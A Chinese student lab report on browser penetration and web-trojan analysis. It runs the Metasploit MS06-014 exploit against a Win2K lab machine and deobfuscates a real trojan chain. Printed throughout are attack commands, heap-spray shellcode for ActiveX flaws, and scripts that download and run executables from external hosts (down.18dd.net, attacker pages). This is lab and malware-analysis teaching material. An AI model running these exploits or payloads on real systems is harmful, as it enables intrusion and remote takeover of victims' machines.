54
社区成员




(1)浏览器:一种用来检索、展示以及传递Web信息资源的应用程序。Web信息资源由统一资源标识符(URI)标记,它是一张网页、一张图片、一段视频或者任何在Web上所呈现的内容。使用者可以借助超级链接(Hyperlinks),通过浏览器浏览互相关联的信息。
(2)HTTP通信协议:是超文本传输协议的简称,属于浏览器和Web服务器之间的通信协议,建立在TCP/IP基础之上,用于传输浏览器到服务器之间的HTTP请求和响应。它不仅需要保证传输网络文档的正确性,同时还确定文档显示的先后顺序。
(3)HTTP协议工作流程:
HTTP协议从Web浏览器到服务器返回信息的过程可以分为4个部分:
1)建立连接:HTTP协议的建立是通过申请Socket套接字实现,用户通过Socket在服务器上申请一个端口号,然后在网络中通过该端口号传输数据。可通过“三次握手”来建立稳定连接。
2)发送请求。用户和服务器之间建立连接后,可以向指定的目的主机发送请求。
3)返回响应。服务器对用户提交的请求进行处理,并返回请求码(如404)或数据。
4)关闭连接。通信结束后,通信双方均可通过关闭套接字来关闭连接,断开访问。
(4)URL:是因特网的万维网服务程序上用于指定信息位置的表示方法,是对可以从互联网上得到的资源的位置和访问方法的一种简洁的表示,是互联网上标准资源的地址。互联网上的每个文件都有一个唯一的URL,它包含的信息指出文件的位置以及浏览器应该怎么处理它。
使用攻击机和Windows靶机进行浏览器渗透攻击实验,体验网页木马构造及实施浏览器攻击的实际过程。
(1)选择使用Metasploit中的MS06-014渗透攻击模块;
(2)选择PAYLOAD为任意远程Shell连接;
(3)设置服务器地址和URL参数,运行exploit,构造出恶意网页木马脚本;
(4)在靶机环境中启动浏览器,验证与服务器的连通性,并访问恶意网页木马脚本URL;
(5)在攻击机的Metasploit软件中查看渗透攻击状态,并通过成功渗透攻击后建立起的远程控制会话SESSION,在靶机上远程执行命令。
(1)首先你应该访问start.html,在这个文件中给出了new09.htm的地址;
(2)在进入 htm 后,每解密出一个文件地址,请对其作 32 位 MD5 散列,以散列值为文件名到 http://192.168.68.253/scom/hashed/ 哈希值下去下载对应的文件,即为解密出的地址对应的文件;
(3)如果解密出的地址给出的是网页或脚本文件,请继续解密;
(4)如果解密出的地址是二进制程序文件,请进行静态反汇编或动态调试;
(5)重复以上过程直到这些文件被全部分析完成。
1)攻击方使用Metasploit构造出至少两个不同Web浏览端软件安全漏洞的渗透攻击代码,并进行混淆处理之后组装成一个URL,通过具有欺骗性的电子邮件发送给防守方。
(2)防守方对电子邮件中的挂马链接进行提取、解混淆分析、尝试恢复出渗透代码的原始形态,并分析这些渗透代码都是攻击哪些Web浏览端软件的哪些安全漏洞。
在kali输入命令行:ipconfig 查看kali的IP地址为:192.168.200.3
在win2K输入命令行: ifconfig 查看win2K的IP地址为:192.168.200.124
在kali输入命令:msconsole
进去后在该模式下,输入命令: search MS06-014 发现只有一个可攻击模块,我们选择这个模块进行攻击
输入命令 use exploit/windows/browser/ie_createobject,进行攻击。
设置攻击机的地址,输入命令 set LHOST 192.168.200.3
接着输入命令 set payload windows/shell/bind_tcp 设定使用的载荷
最后输入命令 exploit 进行攻击
攻击后我们能看见Using URL: http://192.168.200.3:8080/CCYmGUSENCER 。
复制该网址,在win2k的浏览器访问
回到kali界面发现攻击机和靶机之间建立了会话,输入命令 sessions 查看该会话是否为有效会话, 发现是有效会话
打开这个有效会话,在kali输入命令 sessions -i 1 ,发现返回了靶机Win2k的shell,接着输入 ipconfig 查询靶机的IP地址,查询的出靶机的IP地址为192.168.200.124 ,攻击成功。
安装gedit,输入命令行:apt-get install gedit
将学习通上的start.html文件拖入kali中,输入命令行: gedit start.html 打开该文件
在打开的start.html文件里查找 new09.html,发现一共有两处new09.html。并且通过src后面的路径信息可以发现使用的是绝对路径,说明new09.htm与start.html是在同一路径下的。
将压缩文件解压,并把new09.html文件拖到kali里,并输入命令: gedit new09.html 打开该文件
发现里面引用了两个文件,通过在线网站对两个文件进行散列求MD5值
http://aa.18dd.net/aa/kl.htm 的MD5的散列值为:7f60672dcd6b5e90b6772545ee219bd3
http://js.users.51.la/1299644.js 的MD5的散列值为:23180a42a2ff1192150231b44ffdf3d3
找到hashed文件夹里的23180a42a2ff1192150231b44ffdf3d3文件拖入到kali里,输入命令:gedit 23180a42a2ff1192150231b44ffdf3d3 打开该文件,发现是乱码,所以用记事本打开,发现这是流量代码不是木马。
找到hashed文件夹里的7f60672dcd6b5e90b6772545ee219bd3文件拖入到kali里,输入命令:gedit 27f60672dcd6b5e90b6772545ee219bd3 打开该文件。发现该文件使用了xxtea分组密码算法进行了加密。
猜测密钥为\x73\x63\x72\x69\x70\x74。用在线工具对密钥进行解密,解密得密钥是 script
在接着用在线工具对t进行解密,密钥输入为script
将这十六进制的解密结果用在线工具转成字符串
具体的结果如下:
function init(){document.write();}
window.onload = init;
if(document.cookie.indexOf('OK')==-1){
try{var e;
var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie='ce=windowsxp;path=/;expires='+expires.toGMTString();
if(e!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/1.js><\/script>")}
else{
try{var f;var storm=new ActiveXObject("MPS.StormPlayer");}
catch(f){};
finally{if(f!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/b.js><\/script>")}}
try{var g;var pps=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1");}
catch(g){};
finally{if(g!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/pps.js><\/script>")}}
try{var h;var obj=new ActiveXObject("BaiduBar.Tool");}
catch(h){};
finally{if(h!="[object Error]"){
obj.DloadDS("http://down.18dd.net/bb/bd.cab", "bd.exe", 0)}}
}}}
从代码里可以发现一共有四个漏洞
http://aa.18dd.net/aa/1.js
http://down.18dd.net/bb/bd.cab
对这四个漏洞用在线网站求MD5散列值
http://aa.18dd.net/aa/1.js 的md5值为:5d7e9058a857aa2abee820d5473c5fa4
http://aa.18dd.net/aa/b.js 的md5值为:3870c28cc279d457746b3796a262f166
http://aa.18dd.net/aa/pps.js 的md5值为:5f0b8bf0385314dbe0e5ec95e6abedc2
http://down.18dd.net/bb/bd.cab 的md5值为: 1c1d7b3539a617517c49eee4120783b2
根据上一阶段得到的MD5值打开相应文件名
找到hashed文件中的5d7e9058a857aa2abee820d5473c5fa4,拖入到kali里,并输入命令: gedit 5d7e9058a857aa2abee820d5473c5fa4 打开该文件,并将该十六进制的内容转换成字符串
得到的具体内容如下:
var url="http://down.18dd.net/bb/014.exe";try{var xml=ado.CreateObject("Microsoft.XMLHTTP","");xml.Open
("GET",url,0);xml.Send();as.type=1;as.open();as.write(xml.responseBody);path="..\\ntuser.com";as.savetofile(path,2);as.close
();var shell=ado.createobject("Shell.Application","");shell.ShellExecute("cmd.exe","/c "+path,"","open",0)}catch(e){}
从转换出的信息发现,这段代码会下载一个014.exe的可执行文件。计算所要下载的文件的MD5值。
接下来找到hashed文件中的3870c28cc279d457746b3796a262f166,拖入到kali里,并输入命令: gedit 3870c28cc279d457746b3796a262f166 打开该文件。从第一行代码可以看见字母p,a,c,k,e,d 可以猜测出采用了packed加密,所以我们接下来使用packed进行解密
用在线平台,对文件代码进行packed解密
解密结果如下:
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var shellcode = unescape("%uf3e9%u0000" + "%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c" + "%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378" + "%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b" + "%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%ufcef" + "%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1" + "%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" + "%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" + "%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" + "%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" + "%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" + "%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" + "%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344" + "%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc" + "%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0" + "%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab" + "%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f" + "%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574" + "%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e" + "%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00" + "%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c" + "%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54" + "%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465%u622f%u2f62%u6662%u652e%u6578%u0000");
var slackspace = headersize + shellcode.length;
while (bigblock.length < slackspace) bigblock += bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length - slackspace);
while (block.length + slackspace < 0x40000) block = block + block + fillblock;
memory = new Array();
for (x = 0; x < 300; x++) memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 4068) buffer += "\x0a\x0a\x0a\x0a";
storm.rawParse(buffer)
在URL中必然会出现斜线 /, / 的十六进制ASCII码是2f,于是在shellcode中找 / ,根据两个2f密集猜测更有可能,取从第三个2f开始到末尾的内容解密,解密为结果http://down.18dd.net/bb/bf.exe%EF%BC%8C%E5%8F%AF%E4%BB%A5%E7%9C%8B%E5%87%BA%E4%BC%9A%E4%B8%8B%E8%BD%BD%E4%B8%80%E4%B8%AAbf.exe%E7%9A%84%E6%96%87%E4%BB%B6%E3%80%82
计算解密结果的MD5值
找到hashed文件中的5f0b8bf0385314dbe0e5ec95e6abedc2,拖入到kali里,并输入命令: gedit 5f0b8bf0385314dbe0e5ec95e6abedc2
并打开该文件,对文件里的八进制内容,转换成字符串。
转换后具体结果如下:
/*%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
"%u206a%uff53%uec57%u*/
pps=(document.createElement("object"));
pps.setAttribute("classid","clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458")
var shellcode = unescape("%uf3e9%u0000"+
"%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c" +
"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378" +
"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b" +
"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%u04c7" +
"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1" +
"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344" +
"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc" +
"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0" +
"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab" +
"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f" +
"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574" +
"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e" +
"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00" +
"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c" +
"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54" +
"%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465%u622f%u2f62%u7070%u2e73%u7865%u0065");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<400; x++) memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 500) buffer+="\x0a\x0a\x0a\x0a";
pps.Logo = buffer
同样的得到地址 http://down.18dd.net/bb/pps.exe ,从该地址可知会载一个pps.exe的文件,计算该地址的MD5值。
所以总的来说:
MD5( http://down.18dd.net/bb/014.exe ,32) = ca4e4a1730b0f69a9b94393d9443b979
MD5( http://down.18dd.net/bb/bf.exe ,32) = 268cbd59fbed235f6cf6b41b92b03f8e
MD5( http://down.18dd.net/bb/pps.exe ,32) = ff59b3b8961f502289c1b4df8c37e2a4
在浏览器中输入 http://192.168.68.253/scom/hashed/MD5 值下载014.exe、bf.exe、pps.exe这三个可执行文件,最后得到四个可执行文件014.exe,bf.exe,pps.exe,bd.exe。
因为上一阶段得到的四个文件md5后发现其实是同一个文件,所以只需要分析一个可执行文件即可。
接下来以pps.exe进行木马分析:
用PEid打开pps.exe
再用IDA打开这个文件
并且在string window中发现下载了20个exe文件
攻击方:20231915杜照清 kali IP:192.168.31.229
防守方:20231906白怡婕 Win2K IP:192.168.31.134
在我的kali里输入ifconfig查询ip地址,再输入命令: ping 192.168.31.134 测试两边的连通性,连接成功
接下来步骤与前面相似,Kali中输入msfconsole并配置攻击参数
看到含木马的地址 :http://192.168.31.229:8080/DnVfVVihQ
攻击方:20231906白怡婕 kali IP:192.168.31.26
防守方:20231915杜照清 win2K IP:192.168.31.122
在win2K输入命令:ipconfig查询ip地址,再输入命令:ping 192.168.31.26 测试连通性,连接成功
攻击方使用漏洞MS06-014进行攻击,在我的 Win2k上访问页面:http://192.168.31.26:8080/kpK3UMb
右键查看网址网页源代码
发现源码之间很多空格和间隔,猜测是为了躲过杀毒软件的检查。将其删去用压缩格式化工具 http://www.esjson.com/htmlformat.html 去进行压缩格式化。
得到的去格式化结果为:
<html><head><title></title><scriptlanguage="javascript">functionRHGhAJbrMCsKda(o,n){varr=null;try{eval("r=o"+".C"+"re"+"ate"+"Ob"+"je"+"ct(n)")}catch(e){}if(!r){try{eval("r=o"+".Cr"+"ea"+"teO"+"bj"+"ect(n,'')")}catch(e){}}if(!r){try{eval("r=o"+".Cr"+"ea"+"teO"+"bj"+"ect(n,'','')")}catch(e){}}if(!r){try{eval("r=o"+".Ge"+"tOb"+"je"+"ct('',n)")}catch(e){}}if(!r){try{eval("r=o"+".Ge"+"tOb"+"ject(n,'')")}catch(e){}}if(!r){try{eval("r=o"+".Ge"+"tOb"+"ject(n)")}catch(e){}}return(r);}functionBCA(a){vars=RHGhAJbrMCsKda(a,"W"+"Sc"+"ri"+"pt"+".S"+"he"+"ll");varo=RHGhAJbrMCsKda(a,"A"+"DO"+"D"+"B.S"+"tr"+"eam");vare=s.Environment("P"+"ro"+"ce"+"ss");varurl=document.location+'/p'+'ay'+'lo'+'ad';varxml=null;varbin=e.Item("T"+"E"+"M"+"P")+"\\UCNxlhYDhQTrxxBMUJbzvjSyPcYYKBW"+".e"+"xe";vardat;try{xml=newXMLHttpRequest();}catch(e){try{xml=newActiveXObject("Microsoft.XMLHTTP");}catch(e){xml=newActiveXObject("MSXML2.ServerXMLHTTP");}}if(!xml){return(0);}xml.open("GET",url,false);xml.send(null);dat=xml.responseBody;o.Type=1;o.Mode=3;o.Open();o.Write(dat);o.SaveToFile(bin,2);s.Run(bin,0);}functionULXaYiIgbq(){vari=0;vart=newArray('{'+'B'+'D'+'9'+'6'+'C'+'5'+'5'+'6'+'-'+'6'+'5'+'A'+'3'+'-'+'1'+'1'+'D'+'0'+'-'+'9'+'8'+'3'+'A'+'-'+'0'+'0'+'C'+'0'+'4'+'F'+'C'+'2'+'9'+'E'+'3'+'6'+'}','{'+'B'+'D'+'9'+'6'+'C'+'5'+'5'+'6'+'-'+'6'+'5'+'A'+'3'+'-'+'1'+'1'+'D'+'0'+'-'+'9'+'8'+'3'+'A'+'-'+'0'+'0'+'C'+'0'+'4'+'F'+'C'+'2'+'9'+'E'+'3'+'0'+'}','{'+'7'+'F'+'5'+'B'+'7'+'F'+'6'+'3'+'-'+'F'+'0'+'6'+'F'+'-'+'4'+'3'+'3'+'1'+'-'+'8'+'A'+'2'+'6'+'-'+'3'+'3'+'9'+'E'+'0'+'3'+'C'+'0'+'A'+'E'+'3'+'D'+'}','{'+'6'+'e'+'3'+'2'+'0'+'7'+'0'+'a'+'-'+'7'+'6'+'6'+'d'+'-'+'4'+'e'+'e'+'6'+'-'+'8'+'7'+'9'+'c'+'-'+'d'+'c'+'1'+'f'+'a'+'9'+'1'+'d'+'2'+'f'+'c'+'3'+'}','{'+'6'+'4'+'1'+'4'+'5'+'1'+'2'+'B'+'-'+'B'+'9'+'7'+'8'+'-'+'4'+'5'+'1'+'D'+'-'+'A'+'0'+'D'+'8'+'-'+'F'+'C'+'F'+'D'+'F'+'3'+'3'+'E'+'8'+'3'+'3'+'C'+'}','{'+'0'+'6'+'7'+'2'+'3'+'E'+'0'+'9'+'-'+'F'+'4'+'C'+'2'+'-'+'4'+'3'+'c'+'8'+'-'+'8'+'3'+'5'+'8'+'-'+'0'+'9'+'F'+'C'+'D'+'1'+'D'+'B'+'0'+'7'+'6'+'6'+'}','{'+'6'+'3'+'9'+'F'+'7'+'2'+'5'+'F'+'-'+'1'+'B'+'2'+'D'+'-'+'4'+'8'+'3'+'1'+'-'+'A'+'9'+'F'+'D'+'-'+'8'+'7'+'4'+'8'+'4'+'7'+'6'+'8'+'2'+'0'+'1'+'0'+'}','{'+'B'+'A'+'0'+'1'+'8'+'5'+'9'+'9'+'-'+'1'+'D'+'B'+'3'+'-'+'4'+'4'+'f'+'9'+'-'+'8'+'3'+'B'+'4'+'-'+'4'+'6'+'1'+'4'+'5'+'4'+'C'+'8'+'4'+'B'+'F'+'8'+'}','{'+'D'+'0'+'C'+'0'+'7'+'D'+'5'+'6'+'-'+'7'+'C'+'6'+'9'+'-'+'4'+'3'+'F'+'1'+'-'+'B'+'4'+'A'+'0'+'-'+'2'+'5'+'F'+'5'+'A'+'1'+'1'+'F'+'A'+'B'+'1'+'9'+'}','{'+'E'+'8'+'C'+'C'+'C'+'D'+'D'+'F'+'-'+'C'+'A'+'2'+'8'+'-'+'4'+'9'+'6'+'b'+'-'+'B'+'0'+'5'+'0'+'-'+'6'+'C'+'0'+'7'+'C'+'9'+'6'+'2'+'4'+'7'+'6'+'B'+'}','{'+'A'+'B'+'9'+'B'+'C'+'E'+'D'+'D'+'-'+'E'+'C'+'7'+'E'+'-'+'4'+'7'+'E'+'1'+'-'+'9'+'3'+'2'+'2'+'-'+'D'+'4'+'A'+'2'+'1'+'0'+'6'+'1'+'7'+'1'+'1'+'6'+'}','{'+'0'+'0'+'0'+'6'+'F'+'0'+'3'+'3'+'-'+'0'+'0'+'0'+'0'+'-'+'0'+'0'+'0'+'0'+'-'+'C'+'0'+'0'+'0'+'-'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'4'+'6'+'}','{'+'0'+'0'+'0'+'6'+'F'+'0'+'3'+'A'+'-'+'0'+'0'+'0'+'0'+'-'+'0'+'0'+'0'+'0'+'-'+'C'+'0'+'0'+'0'+'-'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'4'+'6'+'}',null);while(t[i]){vara=null;if(t[i].substring(0,1)=='{'){a=document.createElement("object");a.setAttribute("cl"+"as"+"sid","cl"+"s"+"id"+":"+t[i].substring(1,t[i].length-1));}else{try{a=newActiveXObject(t[i]);}catch(e){}}if(a){try{varb=RHGhAJbrMCsKda(a,"W"+"Sc"+"ri"+"pt"+".S"+"he"+"ll");if(b){BCA(a);return(0);}}catch(e){}}i++;}}</script></head><bodyonload='ULXaYiIgbq()'>nqVkebEXlVRsjoPAMrJuZqifBZt</body></html>
s代码中调用了document.location加载了 payload,并且从下一句bin=e.Item(“TEMP”)+"\dMioq.exe"代码中可以看到可执行文件 \ntpsMIH,猜测是以攻击机为服务器的可执行文件,通过网页下载到靶机上,且每次加载恶意网页生成变化的可执行文件名
打开任务管理器验证是否是该文件
可以看到在网页源码中出现的可执行文件名,其作用是帮助攻击机获取靶机控制权限。
并且由文件内容BD96C556-65A3-11D0-983A-00C04FC29E36 可知该漏洞是MS06-014
(1)在测试连通性时,我的kali无法ping通白怡婕的win2K
(2)解决方法:检查发现网络适配器没有调成桥接模式
通过本次实践我对取证分析、网络木马分析等操作有了更深刻的了解,同时加深了我对HTTP协议和MD5等知识点的概念,对web浏览器的安全问题有了更深刻的了解,更加明白了网络安全的概念。